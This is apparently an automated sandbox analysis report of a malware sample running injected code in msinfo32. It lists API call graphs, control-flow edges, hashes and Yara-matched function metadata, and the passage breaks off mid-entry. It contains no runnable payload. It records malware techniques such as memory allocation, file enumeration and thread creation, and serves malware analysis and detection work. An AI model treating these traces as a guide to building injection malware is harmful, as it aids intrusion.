2ed8d3d NtReadFile 93895->93896 93896->93884 93897->93884 93898 2ec5700 93899 2ec7c40 LdrInitializeThunk 93898->93899 93900 2ec5730 93899->93900 93902 2ec575c 93900->93902 93903 2ec7bc0 93900->93903 93904 2ec7c04 93903->93904 93909 2ec7c25 93904->93909 93910 2ed8130 93904->93910 93906 2ec7c15 93907 2ec7c31 93906->93907 93908 2ed8e10 NtClose 93906->93908 93907->93900 93908->93909 93909->93900 93911 2ed81b0 93910->93911 93912 2ed815e 93910->93912 93915 4f04650 LdrInitializeThunk 93911->93915 93912->93906 93913 2ed81d5 93913->93906 93915->93913 93916 2edc0c0 93917 2edaea0 RtlFreeHeap 93916->93917 93918 2edc0d5 93917->93918 93919 2ed6800 93920 2ed6865 93919->93920 93921 2ed6890 93920->93921 93924 2ed0500 93920->93924 93923 2ed6872 93925 2ed04f4 93924->93925 93928 2ed02b0 93924->93928 93925->93923 93926 2ec5f20 LdrInitializeThunk 93926->93928 93927 2ed88e0 LdrInitializeThunk 93927->93928 93928->93925 93928->93926 93928->93927 93929 2ed8e10 NtClose 93928->93929 93929->93928 93930 2eb9990 93931 2eb999f 93930->93931 93932 2eb99e0 93931->93932 93933 2eb99cd CreateThread 93931->93933 93934 2ecc110 93936 2ecc139 93934->93936 93935 2ecc23d 93936->93935 93937 2ecc1e3 FindFirstFileW 93936->93937 93937->93935 93940 2ecc1fe 93937->93940 93938 2ecc224 FindNextFileW 93939 2ecc236 FindClose 93938->93939 93938->93940 93939->93935 93940->93938 93941 2ed8290 93942 2ed831f 93941->93942 93944 2ed82bb 93941->93944 93946 4f02ee0 LdrInitializeThunk 93942->93946 93943 2ed8350 93946->93943 93947 2ed8410 93948 2ed842d 93947->93948 93951 4f02df0 LdrInitializeThunk 93948->93951 93949 2ed8455 93951->93949 93952 2ed5b10 93953 2ed5b6a 93952->93953 93955 2ed5b77 93953->93955 93956 2ed3520 93953->93956 93957 2edae10 NtAllocateVirtualMemory 93956->93957 93958 2ed3561 93957->93958 93959 2ec40b0 2 API calls 93958->93959 93962 2ed366e 93958->93962 93960 2ed35a7 93959->93960 93961 2ed35f0 Sleep 93960->93961 93960->93962 93961->93960 93962->93955 93963 2ed8b10 93964 2ed8bca 93963->93964 93966 2ed8b42 93963->93966 93965 2ed8be0 NtCreateFile 93964->93965 93967 2ec9753 93968 2ec975f 93967->93968 93969 2ec9766 93968->93969 93970 2edaea0 RtlFreeHeap 93968->93970 93970->93969

                                            Executed Functions

                                            Function 02EB99F0 Relevance: 43.0, Strings: 34, Instructions: 480COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 26 2eb99f0-2eb9e08 27 2eb9e19-2eb9e22 26->27 28 2eb9e38-2eb9e42 27->28 29 2eb9e24-2eb9e36 27->29 31 2eb9e53-2eb9e5f 28->31 29->27 32 2eb9e7d-2eb9e89 31->32 33 2eb9e61-2eb9e6d 31->33 34 2eb9e8b-2eb9eac 32->34 35 2eb9eae-2eb9eb8 32->35 36 2eb9e7b 33->36 37 2eb9e6f-2eb9e75 33->37 34->32 39 2eb9ec9-2eb9ed5 35->39 36->31 37->36 40 2eb9eec-2eb9ef3 39->40 41 2eb9ed7-2eb9eea 39->41 43 2eb9f25-2eb9f29 40->43 44 2eb9ef5-2eb9f23 40->44 41->39 45 2eb9f2b-2eb9f42 43->45 46 2eb9f44 43->46 44->40 45->43 47 2eb9f4b-2eb9f64 46->47 47->47 48 2eb9f66-2eb9f6d 47->48 49 2eb9f6f-2eb9f92 48->49 50 2eb9f94-2eb9f9b 48->50 49->48 51 2eb9f9d-2eb9fba 50->51 52 2eb9fbc-2eb9fcd 50->52 51->50 53 2eb9fde-2eb9fe8 52->53 54 2eb9fea-2eb9ffc 53->54 55 2eb9ffe-2eba00f 53->55 54->53 57 2eba020-2eba02c 55->57 58 2eba02e-2eba03b 57->58 59 2eba03d-2eba046 57->59 58->57 61 2eba04c-2eba05f 59->61 62 2eba232-2eba23c 59->62 64 2eba070-2eba07a 61->64 63 2eba24d-2eba259 62->63 65 2eba25b-2eba265 63->65 66 2eba267-2eba26e 63->66 67 2eba0ce-2eba0dd 64->67 68 2eba07c-2eba0cc 64->68 65->63 69 2eba3fc-2eba405 66->69 70 2eba274-2eba27e 66->70 72 2eba208-2eba221 67->72 73 2eba0e3-2eba0ed 67->73 68->64 77 2eba28f-2eba29b 70->77 72->72 76 2eba223-2eba22d 72->76 75 2eba0fe-2eba107 73->75 80 2eba109-2eba115 75->80 81 2eba117-2eba11b 75->81 76->59 78 2eba29d-2eba2a6 77->78 79 2eba2bc-2eba2c3 77->79 82 2eba2a8-2eba2ac 78->82 83 2eba2ad-2eba2af 78->83 87 2eba2f5 call 2edab00 79->87 88 2eba2c5-2eba2f3 79->88 80->75 85 2eba11d-2eba124 81->85 86 2eba127-2eba12b 81->86 82->83 89 2eba2ba 83->89 90 2eba2b1-2eba2b7 83->90 85->86 91 2eba12d-2eba153 86->91 92 2eba155-2eba15f 86->92 95 2eba2fa-2eba304 87->95 88->79 89->77 90->89 91->86 96 2eba170-2eba179 92->96 97 2eba315-2eba31e 95->97 98 2eba17b-2eba18d 96->98 99 2eba18f-2eba199 96->99 101 2eba320-2eba329 97->101 102 2eba336-2eba340 97->102 98->96 103 2eba1aa-2eba1b6 99->103 105 2eba32b-2eba331 101->105 106 2eba334 101->106 104 2eba351-2eba35d 102->104 107 2eba1b8-2eba1c1 103->107 108 2eba1ce-2eba1d8 103->108 109 2eba35f-2eba368 104->109 110 2eba375-2eba37f 104->110 105->106 106->97 113 2eba1cc 107->113 114 2eba1c3-2eba1c9 107->114 111 2eba1e9-2eba1f5 108->111 116 2eba36a-2eba370 109->116 117 2eba373 109->117 120 2eba390-2eba39c 110->120 118 2eba1f7-2eba204 111->118 119 2eba206 111->119 113->103 114->113 116->117 117->104 118->111 119->62 123 2eba39e-2eba3b0 120->123 124 2eba3b2-2eba3c2 120->124 123->120 124->124 126 2eba3c4-2eba3ce 124->126 127 2eba3df-2eba3eb 126->127 127->69 128 2eba3ed-2eba3fa 127->128 128->127
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID: '$s$#t$$$(w$)L$+]$,$-$-e(w$1C$3$3#$3S$4$6|$7$?p$@D$I=$LC$Q$UF$Y$[$_$e$k$n$o$pu$v$~$~[
                                            • API String ID: 0-1767221313
                                            • Opcode ID: e8f8583ca15bf8dec11a5e6b2359d4027345c531c0dcc552d072a290ebff84dc
                                            • Instruction ID: 43f37d0e9b1b7a18a40374c5b71654b063eb734c30dd07cb0155cb7e8e91c28f
                                            • Opcode Fuzzy Hash: e8f8583ca15bf8dec11a5e6b2359d4027345c531c0dcc552d072a290ebff84dc
                                            • Instruction Fuzzy Hash: 41429BB0D45229CBEB25CF44CA98BEEBBB2BF45308F1091D9D5096B382C7B55A85CF41
                                            Function 02ECC110 Relevance: 4.6, APIs: 3, Instructions: 106fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNELBASE(?,00000000), ref: 02ECC1F4
                                            • FindNextFileW.KERNELBASE(?,00000010), ref: 02ECC22F
                                            • FindClose.KERNELBASE(?), ref: 02ECC23A
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Find$File$CloseFirstNext
                                            • String ID:
                                            • API String ID: 3541575487-0
                                            • Opcode ID: ae1f5de46b7d885081abe0b275a01cf9b1fd9cd511b6b8782dc6db442755ffb0
                                            • Instruction ID: aed374d0772cd1fafe8bded7a497ac3518a241c818630e4af9d14d3f3cd22d9d
                                            • Opcode Fuzzy Hash: ae1f5de46b7d885081abe0b275a01cf9b1fd9cd511b6b8782dc6db442755ffb0
                                            • Instruction Fuzzy Hash: 3731A4759406086BDB20DBE0CC85FFF777C9B44718F24949DB50CAA180E670AA468BA0
                                            Function 02ED8B10 Relevance: 1.6, APIs: 1, Instructions: 101filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateFile.NTDLL(?,?,?,?,F4BE8C80,?,?,?,?,?,?), ref: 02ED8C11
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0
                                            • Opcode ID: 26b38ecf28873711e68fba4d616ace3b5c5e70e1f3e7d97999a64b3286dc2217
                                            • Instruction ID: 17be1ade0eea6a7ab8c140f8e7ade55d2aff6c73ed827b3fb7522dcbb520727a
                                            • Opcode Fuzzy Hash: 26b38ecf28873711e68fba4d616ace3b5c5e70e1f3e7d97999a64b3286dc2217
                                            • Instruction Fuzzy Hash: 4331C5B5A41608AFCB14DF99D840EEEB7B9EF8C314F108219F918A7340D730A952CFA1
                                            Function 02ED8C80 Relevance: 1.6, APIs: 1, Instructions: 93filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtReadFile.NTDLL(?,?,?,?,F4BE8C80,?,?,?,?), ref: 02ED8D66
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: FileRead
                                            • String ID:
                                            • API String ID: 2738559852-0
                                            • Opcode ID: 3bfe58e093f50432aece3f42043520b97b06db6b7c52ec93a8443868dceddf28
                                            • Instruction ID: 2cfb27e87f023d1ac4519b750c6099e63bd2daa3478d476ba2c2c49b416a9d32
                                            • Opcode Fuzzy Hash: 3bfe58e093f50432aece3f42043520b97b06db6b7c52ec93a8443868dceddf28
                                            • Instruction Fuzzy Hash: 9F31C3B5A40248AFDB14DF99D880EEFB7B9EF88314F108119F919A7340D774A912CFA5
                                            Function 02ED8F70 Relevance: 1.6, APIs: 1, Instructions: 81memorynativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtAllocateVirtualMemory.NTDLL(02EC18FB,?,02ED7A4F,00000000,F4BE8C80,00003000,?,?,?,?,?,02ED7A4F,02EC18FB), ref: 02ED9038
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: AllocateMemoryVirtual
                                            • String ID:
                                            • API String ID: 2167126740-0
                                            • Opcode ID: 7a8860901ea27a2cf3111d9f556b42976b3706d4fa793628e101962242a4e2a7
                                            • Instruction ID: 19ee73ddff12d1978d2e121bb00695fd537696285328d7e3b0e18711ff9c6a96
                                            • Opcode Fuzzy Hash: 7a8860901ea27a2cf3111d9f556b42976b3706d4fa793628e101962242a4e2a7
                                            • Instruction Fuzzy Hash: 302117B5A40249ABDB14DF98DC41FEFB7BAEF88314F008119F918AB340D774A911CBA1
                                            Function 02ED8D70 Relevance: 1.6, APIs: 1, Instructions: 61filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: DeleteFile
                                            • String ID:
                                            • API String ID: 4033686569-0
                                            • Opcode ID: da024b06ff85177f8ba737a894ca04aa6a05c97ed00ec557c2a9c459de66f5ee
                                            • Instruction ID: 22b5a650e4b972cc5d4e4ec1d994e3c01f62c66af44995781aeaa5f4ce8843e5
                                            • Opcode Fuzzy Hash: da024b06ff85177f8ba737a894ca04aa6a05c97ed00ec557c2a9c459de66f5ee
                                            • Instruction Fuzzy Hash: 7E117C71A81709BAD620EB95CC41FEBB3ADDF85314F408159F948AB280D775BA06CBB1
                                            Function 02ED8E10 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtClose.NTDLL(?,02EC2C83,001F0001,?,00000000,?,?,00000104), ref: 02ED8E47
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2954157360.0000000002EB0000.00000040.80000000.00040000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_2eb0000_msinfo32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Close
                                            • String ID:
                                            • API String ID: 3535843008-0
                                            • Opcode ID: f979f3fc88ea59a6c65e65801da5714732bf1699c4a0773a7f83e0e0d613a685
                                            • Instruction ID: d082338bb39e1a337e9ad22b69165846e116e1e140c2862dd587aeb3da05d654
                                            • Opcode Fuzzy Hash: f979f3fc88ea59a6c65e65801da5714732bf1699c4a0773a7f83e0e0d613a685
                                            • Instruction Fuzzy Hash: 48E04F312412147BD610AA59DC00FD7776DDFC5760F41C415FE48AB241C671B90187F1
                                            Function 04F04650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: ec54c07b1e606826675385ef374a644dff1818d259e936ee3e3ee4929080ac5e
                                            • Instruction ID: 4868d16da45a58311056f1c85b9c25f0215a5bd72992004cbd2a4234c6cceb5a
                                            • Opcode Fuzzy Hash: ec54c07b1e606826675385ef374a644dff1818d259e936ee3e3ee4929080ac5e
                                            • Instruction Fuzzy Hash: 4B9002616815005361407158890440670059BE2345395C116A0555561CC718D956926A
                                            Function 04F04340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: f683ce9ba64e73816d2c7a2de9a973ed768b033b5d3d732fb06ca6cdf042a650
                                            • Instruction ID: 3f72ab0182ae06c77213e5e7992c6742cff215a394b050822e2ff5fccb2fb8a0
                                            • Opcode Fuzzy Hash: f683ce9ba64e73816d2c7a2de9a973ed768b033b5d3d732fb06ca6cdf042a650
                                            • Instruction Fuzzy Hash: 8290023168580023B1407158898454650059BE1345B55C012E0425555CCB14DA575362
                                            Function 04F02CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 3b36a165ba76d2aef327b9520101a661eac575df53866efd5b696e2830639946
                                            • Instruction ID: b1fe492f14105fafb736d60a166f780b560e5267a2d5c74ec206118510e11b14
                                            • Opcode Fuzzy Hash: 3b36a165ba76d2aef327b9520101a661eac575df53866efd5b696e2830639946
                                            • Instruction Fuzzy Hash: A390023128140413F1007598950864610058BE1345F55D012A5025556EC765D9926132
                                            Function 04F02C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: c90804f4eb8c61a4cb146153379e7e6a0e0f0aa7f3256bad8e752ae2ff3df13e
                                            • Instruction ID: 91a996ab0206dd8230048888c1fb09ac524ece8385cd9e1cf9e869ad65d8fe47
                                            • Opcode Fuzzy Hash: c90804f4eb8c61a4cb146153379e7e6a0e0f0aa7f3256bad8e752ae2ff3df13e
                                            • Instruction Fuzzy Hash: D190023128148813F1107158C50474A10058BD1345F59C412A4425659DC795D9927122
                                            Function 04F02C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 19c9d8b38e9585b224a6f0723d539ed981d4c0d35967eb842ad7899a7ff6b56f
                                            • Instruction ID: 159c03e6e78f66db92b009fea5ae180d28883b743b8267dc917fb34b5def8b5b
                                            • Opcode Fuzzy Hash: 19c9d8b38e9585b224a6f0723d539ed981d4c0d35967eb842ad7899a7ff6b56f
                                            • Instruction Fuzzy Hash: C290023128140853F10071588504B4610058BE1345F55C017A0125655DC715D9527522
                                            Function 04F02DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: b02f9eab453aebfc06b1fb6ade39ebf3d28abb24ee99730a23d0bb1de7a2afd8
                                            • Instruction ID: 63afa39b43a1bd9c5df9666e8e46cd5a57c10130fec2a0fd7282afa408b7fe40
                                            • Opcode Fuzzy Hash: b02f9eab453aebfc06b1fb6ade39ebf3d28abb24ee99730a23d0bb1de7a2afd8
                                            • Instruction Fuzzy Hash: 2190023128140423F1117158860470710098BD1285F95C413A0425559DD756DA53A122
                                            Function 04F02DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 205d319bfbf31421a2ce6e37ac3feafee581c64f9110128ef802a77a29b6e4e0
                                            • Instruction ID: c59e72e3fc673619a58bfc25bb88bed9068b4718ec6f05fbab54782c9d823030
                                            • Opcode Fuzzy Hash: 205d319bfbf31421a2ce6e37ac3feafee581c64f9110128ef802a77a29b6e4e0
                                            • Instruction Fuzzy Hash: 9B9002212C2441637545B158850450750069BE1285795C013A1415951CC626E957D622
                                            Function 04F02D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: aec5f0d4b09a4126797d76dedd045bad7c94428148c7c4b532b05c91212c6462
                                            • Instruction ID: 410fe295a765a732cb376e197de7c7a77d5a522f3eb6fa8ba131aa2dd9a83456
                                            • Opcode Fuzzy Hash: aec5f0d4b09a4126797d76dedd045bad7c94428148c7c4b532b05c91212c6462
                                            • Instruction Fuzzy Hash: 5890022138140013F140715895186065005DBE2345F55D012E0415555CDA15D9575223
                                            Function 04F02D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a110be8533b3cdf26c7f134e0f4a7d007f4911d0ae455c5164e2cb92a7702452
                                            • Instruction ID: a75dd934decb5ae748a0f6fda45ac5b61ad2a591f7e8f9cb2fe1e13828308604
                                            • Opcode Fuzzy Hash: a110be8533b3cdf26c7f134e0f4a7d007f4911d0ae455c5164e2cb92a7702452
                                            • Instruction Fuzzy Hash: 8B90022929340013F1807158950860A10058BD2246F95D416A0016559CCA15D96A5322
                                            Function 04F02EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: a37c1b0c578190683134a10bbec2091351410ef0dbc6030dc3ad6f8c6290ea8f
                                            • Instruction ID: 6e60e4817d4a7d9299cc612344c5e88c7e3380c71f0815060f7622a3278454be
                                            • Opcode Fuzzy Hash: a37c1b0c578190683134a10bbec2091351410ef0dbc6030dc3ad6f8c6290ea8f
                                            • Instruction Fuzzy Hash: 0490026128180413F1407558890460710058BD1346F55C012A2065556ECB29DD526136
                                            Function 04F02E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 1f5abbb10de74d567184a1e3489f75adc83eeef41fe88b45d2b2229dc8195c1a
                                            • Instruction ID: 333e06b1e1b850e0907ff4ae8111dcf7f43aa63b605223a79acc78a36446b344
                                            • Opcode Fuzzy Hash: 1f5abbb10de74d567184a1e3489f75adc83eeef41fe88b45d2b2229dc8195c1a
                                            • Instruction Fuzzy Hash: 3E90022168140513F10171588504616100A8BD1285F95C023A1025556ECB25DA93A132
                                            Function 04F02FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.0000000004FBD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 0000000D.00000002.2955503998.000000000502E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_13_2_4e90000_msinfo32.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID:
                                            • API String ID: 2994545307-0
                                            • Opcode ID: 47840fbf82658189609768095e284bc398ef3b0038754c6ac0bfb830548238aa
                                            • Instruction ID: 640f9302863767a3340fc3813f52818aad4a28079464cbdb0826eb92da1d26e7
                                            • Opcode Fuzzy Hash: 47840fbf82658189609768095e284bc398ef3b0038754c6ac0bfb830548238aa
                                            • Instruction Fuzzy Hash: F7900221291C0053F20075688D14B0710058BD1347F55C116A0155555CCA15D9625522
                                            Function 04F02FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000D.00000002.2955503998.0000000004E90000.00000040.00001000.00020000.00000000.sdmp, Offset: 04E90000, based on PE: true
                                            • Associated: 0000000D.00000002.2955503998.0000000004FB9000.00000040.00001000.00020000.00000000.sdmpDownload File
